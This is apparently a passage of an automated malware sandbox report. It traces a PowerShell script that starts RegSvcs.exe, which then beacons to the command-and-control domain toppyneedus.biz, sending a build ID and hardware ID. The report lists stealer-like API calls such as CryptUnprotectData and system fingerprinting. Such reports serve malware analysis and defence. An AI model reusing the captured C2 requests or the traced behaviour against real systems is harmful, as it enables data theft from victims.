                                                                            2025-01-27 14:58:29 UTC12307OUTData Raw: 66 2b 99 de 15 9f db 5d 97 86 e2 fe b3 27 62 81 c6 e2 59 60 51 69 28 e0 d7 94 be 69 b3 8d bc d3 24 47 94 27 3b 3d f3 94 ba 09 03 6a 80 b5 cd 1c 23 39 05 23 76 9b 87 c1 30 98 73 0f 79 18 01 9c b2 26 9c ff 75 34 de 84 ee d6 ac d8 54 d8 84 d5 24 a3 4d ad 2c bd 22 ec 34 5b 4c 39 e4 6c e7 18 bc 03 c0 a3 8e 83 17 5c ee 40 87 7f d9 5c f1 2f b6 22 e9 34 5d c1 03 e6 81 99 43 18 d6 7f 5d 2e 20 f0 c8 a1 bd 99 7a ae bf 53 b8 b8 76 88 81 db 5e 18 20 1e e9 71 c4 9e 54 76 9f 5f 2c a4 f4 90 76 d0 97 f1 41 a2 59 70 1c b3 20 e3 42 7f 92 d6 bc 27 d5 b7 34 d5 91 e5 f2 c8 f6 f8 47 10 63 bf c7 43 b2 99 43 7a 5d 44 9d 01 1b 0c 47 8b 0e 17 dc 75 20 5f 63 0d 7b 22 2e f2 db 5c e3 ee 47 0e 44 b4 e3 d1 41 bf bb 15 3c 09 fc e1 15 a1 19 47 36 9f cd 1e 7d 66 49 a9 13 f0 ed 0a e5 ee e7
                                                                            Data Ascii: f+]'bY`Qi(i$G';=j#9#v0sy&u4T$M,"4[L9l\@\/"4]C]. zSv^ qTv_,vAYp B'4GcCCz]DGu _c{".\GDA<G6}fI
                                                                            2025-01-27 14:58:32 UTC1128INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:32 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=d6fvf7eqtndbmh2qkp0l9th151; expires=Fri, 23 May 2025 08:45:09 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdimrRkwRnUkYwdB05Wo0B37cNyGLqT%2F5McsctmPkYWiZ0FC17dGdRsPYNF0uvcNue1h8zIRcYIznQddCgCOAw4R05N08C3R%2BTfSojtO1xFS1quyMhFut6SDKGfuQalaxIE%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999e42d030f99-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1596&rtt_var=929&sent=56&recv=160&lost=0&retrans=0&sent_bytes=2839&recv_bytes=151612&delivery_rate=1000685&cwnd=172&unsent_bytes=0&cid=09dfda5cd1e05377&ts=3551&x=0"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.749826104.21.29.1424438024C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-27 14:58:33 UTC263OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 81
                                                                            Host: toppyneedus.biz
                                                                            2025-01-27 14:58:33 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4e 4e 61 57 43 4d 2d 2d 57 4f 52 4b 26 6a 3d 26 68 77 69 64 3d 32 43 44 45 36 43 30 32 36 35 31 38 35 44 37 32 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45
                                                                            Data Ascii: act=get_message&ver=4.0&lid=NNaWCM--WORK&j=&hwid=2CDE6C0265185D724654FD9A0884370E
                                                                            2025-01-27 14:58:33 UTC1126INHTTP/1.1 200 OK
                                                                            Date: Mon, 27 Jan 2025 14:58:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=6ssc642ic5mmpbs8o1gs6kkdvi; expires=Fri, 23 May 2025 08:45:12 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGbleG8N337FOAx%2FP54akmeFtA8G%2F4H2joVJfYPfq%2FZYAe7FTULwiPgCxBx8ylJUnTipg1X7BpucE%2Fw%2BA1IouKvQakoiHZQjDRFTNMXaFrgmqogU6QejTBE6nRMZdgnHPKw%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 908999fdb82f41c3-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1672&rtt_var=907&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=980&delivery_rate=1044722&cwnd=72&unsent_bytes=0&cid=6c3dcc20026471ca&ts=776&x=0"
                                                                            2025-01-27 14:58:33 UTC54INData Raw: 33 30 0d 0a 6f 37 54 4c 4c 50 37 75 49 59 51 6c 78 6a 52 7a 51 6e 66 74 65 77 30 51 77 52 30 71 50 4f 39 73 67 6c 31 57 41 39 33 77 2f 4b 50 34 36 51 3d 3d 0d 0a
                                                                            Data Ascii: 30o7TLLP7uIYQlxjRzQnftew0QwR0qPO9sgl1WA93w/KP46Q==
                                                                            2025-01-27 14:58:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Click to jump to process

                                                                            050100s0.0020406080100MB

                                                                            Click to jump to process

                                                                            • File
                                                                            • Registry

                                                                            Click to dive into process behavior distribution

                                                                            Target ID:0
                                                                            Start time:09:58:15
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1"
                                                                            Imagebase:0x7ff741d30000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            Target ID:1
                                                                            Start time:09:58:15
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff75da10000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:09:58:18
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                            Imagebase:0xd60000
                                                                            File size:45'984 bytes
                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            Target ID:4
                                                                            Start time:09:58:18
                                                                            Start date:27/01/2025
                                                                            Path:C:\Windows\System32\wermgr.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0"
                                                                            Imagebase:0x7ff73e620000
                                                                            File size:229'728 bytes
                                                                            MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            Executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a92cc29613bd2051e1a49e8af2368cc2e5e2727651f6827a32ef8a47ffbb7c1
                                                                            • Instruction ID: fe166155f8360b8a3cb40097861f0b715a1f59af22a48d5ed57409e880012595
                                                                            • Opcode Fuzzy Hash: 9a92cc29613bd2051e1a49e8af2368cc2e5e2727651f6827a32ef8a47ffbb7c1
                                                                            • Instruction Fuzzy Hash: 86A17A22A4E78A8FF799976898555797FD1EF47320B0841BEE04EC7193DE1AD80AC3C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d36998c80ca819a3fa751102055ba2292fada5ee4d082776f8d07bda5f964d6
                                                                            • Instruction ID: 4b7482d51c151a81fd3399ed997d127336c9402633dbb0dbfb9f23f2e93de8c8
                                                                            • Opcode Fuzzy Hash: 5d36998c80ca819a3fa751102055ba2292fada5ee4d082776f8d07bda5f964d6
                                                                            • Instruction Fuzzy Hash: DC317A30A0560DCFEB94EF68C4146ED73B1FB99315F10857AE41AE7284CB39A959CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b94b4ce948f3dde702f7fa1393b25e40cd0205022ca41f2928377c31876c74b
                                                                            • Instruction ID: 8de72a476a5e5677f944d2710811c06cc8bd9c1c98df5fe00ef2335f832ef28e
                                                                            • Opcode Fuzzy Hash: 1b94b4ce948f3dde702f7fa1393b25e40cd0205022ca41f2928377c31876c74b
                                                                            • Instruction Fuzzy Hash: 2401967044E389CFD706DF2498165EA3FF0EF46304F0545AAE859C7192C7389669C7C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e0ad0479e28600c6450be2285166dc21ce2d527386ae111416ea2d5f427732a
                                                                            • Instruction ID: 708cee9ea0cb7ec7102788f440fa9037315eef3113ec974db13a2e0a25b73c51
                                                                            • Opcode Fuzzy Hash: 6e0ad0479e28600c6450be2285166dc21ce2d527386ae111416ea2d5f427732a
                                                                            • Instruction Fuzzy Hash: 9A012D71908A4D8FDF85EF68C458AA97BF0FF69300F0445AAD419C71A1DB359949CB41
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                            • Instruction ID: 910827682fc1cf058746adb8774e728e94f759da779de6ab5ddbfcd33ee06f0d
                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                            • Instruction Fuzzy Hash: 5401677111CB0D8FDB44EF0CE451AB6B7E0FB99364F10056EE58AC3661D636E882CB45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9cc769ceafa414470ef7825602db3908bb8096af9e8e437c451c368dc1156f3
                                                                            • Instruction ID: 00acf9e578268fcf430d7b1d0f3d0326c0c7e607742a54d1d6a38049e6c2c69a
                                                                            • Opcode Fuzzy Hash: a9cc769ceafa414470ef7825602db3908bb8096af9e8e437c451c368dc1156f3
                                                                            • Instruction Fuzzy Hash: 94F02B33E6A91F8FF251671CA40A1AA77C4FF11350B8581B6E40FC7061DD09981942C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 518b59ef5ce4bb795ebda41ff225531e08c198866228df31cfa6cf50de7dd2bc
                                                                            • Instruction ID: 3e8eef9609d83cac578a27fe31e6da4ff2312935a5e715fed4e75454425d592b
                                                                            • Opcode Fuzzy Hash: 518b59ef5ce4bb795ebda41ff225531e08c198866228df31cfa6cf50de7dd2bc
                                                                            • Instruction Fuzzy Hash: 17F02413F8E99E8FFBA8A26C24456FA6BC5DF56520B4881BAE44EC3283DC059C0943C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1916343053.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac550000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4fb7f17d16d5aa26b771d40af4e8b64242fc99389fe0a8970e8d4880ef75eb94
                                                                            • Instruction ID: 83dd7105f33f1c4ad8f131c99dd1eff23da2fe9126aa8d49db3c9a7513b24a38
                                                                            • Opcode Fuzzy Hash: 4fb7f17d16d5aa26b771d40af4e8b64242fc99389fe0a8970e8d4880ef75eb94
                                                                            • Instruction Fuzzy Hash: C6F0C23180D6CE8FEB659F64C8552E93FA0FF52300F0445BAE48C83492CA7A9558C781
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9646f8152efc61e5660b4ea87d28859819651d1727e0361159ebcfd2172e6c87
                                                                            • Instruction ID: 2cb20124c1eb8bc5f6db0891fe8817ff6396b2adec8351dba2d4f3ec84903021
                                                                            • Opcode Fuzzy Hash: 9646f8152efc61e5660b4ea87d28859819651d1727e0361159ebcfd2172e6c87
                                                                            • Instruction Fuzzy Hash: 63F0677081424DCFEB44EF2894095EA37A0FF49308F50456AF81D82240CB34E654CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 238bb28938677b0ebbae26e197daa61e26c96432a0505dc7e3244e8a3b493a52
                                                                            • Instruction ID: 696fc56aac091907f4f6c193ee891425e52115e18d5b1c7dde16dc4cbf12287a
                                                                            • Opcode Fuzzy Hash: 238bb28938677b0ebbae26e197daa61e26c96432a0505dc7e3244e8a3b493a52
                                                                            • Instruction Fuzzy Hash: 9FF01775D0420BCFDB00DFA8C4855BEB7B0AB05314F108925C129E7250DB38EA508F84
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07ed015e6494394615ab09e0ab4d0026b084b62ac782e46b95bb78be9cfd3682
                                                                            • Instruction ID: 089e09253febd0c3c2703ba151328449fcb96de2afa272ccdf248df7540313c3
                                                                            • Opcode Fuzzy Hash: 07ed015e6494394615ab09e0ab4d0026b084b62ac782e46b95bb78be9cfd3682
                                                                            • Instruction Fuzzy Hash: 55F01C30D0950D8FE798DB38C8547ECB6B0AF15340F0080FA904DE61A1DE342AC58F05

                                                                            Non-executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1915816508.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac480000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11adf2dc3a0806ebc0bf174e244545f7af7874155b8a512b232d9fd3c32cb735
                                                                            • Instruction ID: f52795e443151bcb82f7d9e5ed6e3bc7d92449b23592bfcdedbd67169de6c425
                                                                            • Opcode Fuzzy Hash: 11adf2dc3a0806ebc0bf174e244545f7af7874155b8a512b232d9fd3c32cb735
                                                                            • Instruction Fuzzy Hash: 3002C297A0E7D29FF313476C58B91E53F60EFA3629B0940F7C1D88A093E918594E83E5

                                                                            Execution Graph

                                                                            Execution Coverage

                                                                            Dynamic/Packed Code Coverage

                                                                            Signature Coverage

                                                                            Execution Coverage:5.9%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:37.3%
                                                                            Total number of Nodes:295
                                                                            Total number of Limit Nodes:27
                                                                            Show Legend
                                                                            Hide Nodes/Edges
                                                                            execution_graph 22773 429f42 22774 429f48 22773->22774 22775 429f58 RtlExpandEnvironmentStrings 22774->22775 22776 429f79 22775->22776 22776->22776 22783 447050 22776->22783 22778 42a214 22782 42a493 22778->22782 22787 426420 22778->22787 22780 42a08d 22780->22778 22780->22780 22781 447050 LdrInitializeThunk 22780->22781 22781->22778 22784 447070 22783->22784 22786 4471be 22784->22786 22803 443ab0 LdrInitializeThunk 22784->22803 22786->22780 22804 446e10 22787->22804 22789 426460 22797 426adb 22789->22797 22808 441f30 22789->22808 22791 4264b9 22798 4264d0 22791->22798 22811 443ab0 LdrInitializeThunk 22791->22811 22793 441f50 RtlFreeHeap 22795 426ac8 22793->22795 22794 441f30 RtlAllocateHeap 22794->22798 22795->22797 22817 443ab0 LdrInitializeThunk 22795->22817 22797->22782 22798->22794 22799 426aad 22798->22799 22812 443ab0 LdrInitializeThunk 22798->22812 22813 441f50 22798->22813 22799->22793 22800 426b9f 22799->22800 22803->22786 22805 446e20 22804->22805 22805->22805 22806 446f6e 22805->22806 22818 443ab0 LdrInitializeThunk 22805->22818 22806->22789 22819 444f80 22808->22819 22810 441f3a RtlAllocateHeap 22810->22791 22811->22791 22812->22798 22814 441f63 22813->22814 22815 441f6b 22813->22815 22814->22798 22816 441f81 RtlFreeHeap 22815->22816 22817->22795 22818->22806 22820 444f90 22819->22820 22820->22810 22820->22820 22821 41e081 22823 41e090 22821->22823 22822 41e2c8 CryptUnprotectData 22822->22823 22823->22822 22824 443c41 22825 443cc0 22824->22825 22826 443ece 22825->22826 22828 443ab0 LdrInitializeThunk 22825->22828 22828->22826 22829 433345 22830 433351 GetComputerNameExA 22829->22830 22832 444402 22833 44443e 22832->22833 22834 444423 22832->22834 22833->22833 22834->22833 22836 443ab0 LdrInitializeThunk 22834->22836 22836->22833 22837 438f0b CoSetProxyBlanket 22838 44410c 22840 444120 22838->22840 22839 44425e 22841 44430e 22839->22841 22845 443ab0 LdrInitializeThunk 22839->22845 22840->22839 22844 443ab0 LdrInitializeThunk 22840->22844 22844->22839 22845->22841 22846 433209 22847 433217 FreeLibrary 22846->22847 22849 43323b 22847->22849 22849->22849 22850 433304 GetComputerNameExA 22849->22850 22851 43333d 22850->22851 22851->22851 22852 43408d 22853 4340c0 22852->22853 22854 43414e 22853->22854 22856 443ab0 LdrInitializeThunk 22853->22856 22856->22854 22857 40ba50 22859 40ba5f 22857->22859 22858 40bd97 ExitProcess 22859->22858 22860 40ba74 GetCurrentProcessId GetCurrentThreadId 22859->22860 22870 40bd80 22859->22870 22861 40ba9a 22860->22861 22862 40ba9e SHGetSpecialFolderPathW GetForegroundWindow 22860->22862 22861->22862 22864 40bbe3 22862->22864 22865 441f30 RtlAllocateHeap 22864->22865 22866 40bcf8 22865->22866 22866->22870 22871 410c90 CoInitializeEx 22866->22871 22872 443a30 FreeLibrary 22870->22872 22872->22858 22873 425dd0 22874 425e30 22873->22874 22875 425dde 22873->22875 22879 425ef0 22875->22879 22877 425eac 22877->22874 22878 424230 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 22877->22878 22878->22874 22880 425f00 22879->22880 22880->22880 22881 447050 LdrInitializeThunk 22880->22881 22882 425fdf 22881->22882 22883 43e8d0 22885 43e8de 22883->22885 22886 43e973 22885->22886 22892 443ab0 LdrInitializeThunk 22885->22892 22888 43ea56 22886->22888 22890 43ea3d 22886->22890 22891 443ab0 LdrInitializeThunk 22886->22891 22888->22890 22893 443ab0 LdrInitializeThunk 22888->22893 22891->22886 22892->22885 22893->22888 22894 43395b 22895 433966 22894->22895 22895->22895 22896 433d94 GetPhysicallyInstalledSystemMemory 22895->22896 22897 433dc0 22896->22897 22898 412b9f 22899 412baf 22898->22899 22928 42a4e0 22899->22928 22901 412bd5 22939 42a750 22901->22939 22903 412bf5 22950 42c250 22903->22950 22909 412c27 22985 42eac0 22909->22985 22911 412c50 22912 43a020 6 API calls 22911->22912 22913 412c79 22912->22913 22914 42a4e0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22913->22914 22915 412cb2 22914->22915 22916 42a750 RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22915->22916 22917 412cd2 22916->22917 22918 42c250 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 22917->22918 22919 412cf2 22918->22919 22920 42cbe0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22919->22920 22921 412cfb 22920->22921 22922 42d020 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22921->22922 22923 412d04 22922->22923 22924 42eac0 RtlExpandEnvironmentStrings 22923->22924 22925 412d2d 22924->22925 22926 43a020 6 API calls 22925->22926 22927 412d56 22926->22927 22929 42a580 22928->22929 22929->22929 22930 42a59f RtlExpandEnvironmentStrings 22929->22930 22933 42a5f0 22930->22933 22932 42a719 22932->22901 22933->22932 22934 42a64f 22933->22934 22935 42a901 22933->22935 22937 42a630 RtlExpandEnvironmentStrings 22933->22937 22990 446010 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22933->22990 22989 424190 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22934->22989 22991 445b30 22935->22991 22937->22932 22937->22933 22937->22934 22937->22935 22940 42a75e 22939->22940 23004 4459e0 22940->23004 22942 42a618 22943 42a719 22942->22943 22945 42a901 22942->22945 22946 42a64f 22942->22946 22949 42a630 RtlExpandEnvironmentStrings 22942->22949 23008 446010 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22942->23008 22943->22903 22947 445b30 3 API calls 22945->22947 22946->22946 23003 424190 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22946->23003 22947->22943 22949->22942 22949->22943 22949->22945 22949->22946 22951 42c296 22950->22951 22952 412c15 22950->22952 22953 42c524 22950->22953 22954 42c505 22950->22954 22951->22952 22951->22953 22951->22954 22957 4459e0 LdrInitializeThunk 22951->22957 22962 42c58c 22951->22962 22963 42cbe0 22952->22963 22953->22952 22953->22962 23010 443a50 22953->23010 23029 446010 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22954->23029 22957->22951 22958 4459e0 LdrInitializeThunk 22958->22962 22960 443ab0 LdrInitializeThunk 22960->22962 22961 445b30 3 API calls 22961->22962 22962->22952 22962->22958 22962->22960 22962->22961 23019 4467e0 22962->23019 22964 42cc00 22963->22964 22967 42cc3e 22964->22967 23032 443ab0 LdrInitializeThunk 22964->23032 22966 412c1e 22973 42d020 22966->22973 22967->22966 22968 441f30 RtlAllocateHeap 22967->22968 22969 42cd42 22968->22969 22972 42cdbe 22969->22972 23033 443ab0 LdrInitializeThunk 22969->23033 22971 441f50 RtlFreeHeap 22971->22966 22972->22971 22972->22972 23034 42d040 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22973->23034 22975 42d034 22975->22909 22976 42d029 22976->22975 22977 43ff00 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22976->22977 22984 42d8b6 22977->22984 22978 42d8e0 22978->22909 22979 446e10 LdrInitializeThunk 22979->22984 22980 4472a0 LdrInitializeThunk 22980->22984 22981 4473c0 LdrInitializeThunk 22981->22984 22982 42dc7f 22982->22978 22983 443ab0 LdrInitializeThunk 22982->22983 22983->22978 22984->22978 22984->22979 22984->22980 22984->22981 22984->22982 22986 42eb00 22985->22986 22986->22986 22987 42eb57 RtlExpandEnvironmentStrings 22986->22987 22988 42ebb0 22987->22988 22989->22932 22990->22933 22992 445b50 22991->22992 22995 445bfa 22992->22995 23001 443ab0 LdrInitializeThunk 22992->23001 22994 446000 22994->22932 22995->22994 22996 441f30 RtlAllocateHeap 22995->22996 22997 445d6c 22996->22997 23000 445e2a 22997->23000 23002 443ab0 LdrInitializeThunk 22997->23002 22999 441f50 RtlFreeHeap 22999->22994 23000->22999 23000->23000 23001->22995 23002->23000 23003->22943 23005 445a00 23004->23005 23005->23005 23007 445a7e 23005->23007 23009 443ab0 LdrInitializeThunk 23005->23009 23007->22942 23008->22942 23009->23007 23011 443a95 23010->23011 23012 443a76 23010->23012 23013 443a68 23010->23013 23014 443a8a 23010->23014 23016 441f50 RtlFreeHeap 23011->23016 23017 443a7b RtlReAllocateHeap 23012->23017 23013->23011 23013->23012 23015 441f30 RtlAllocateHeap 23014->23015 23018 443a90 23015->23018 23016->23018 23017->23018 23018->22962 23020 4467ef 23019->23020 23022 4468fe 23020->23022 23030 443ab0 LdrInitializeThunk 23020->23030 23023 446c00 23022->23023 23024 441f30 RtlAllocateHeap 23022->23024 23023->22962 23025 446a50 23024->23025 23028 446aaf 23025->23028 23031 443ab0 LdrInitializeThunk 23025->23031 23027 441f50 RtlFreeHeap 23027->23023 23028->23027 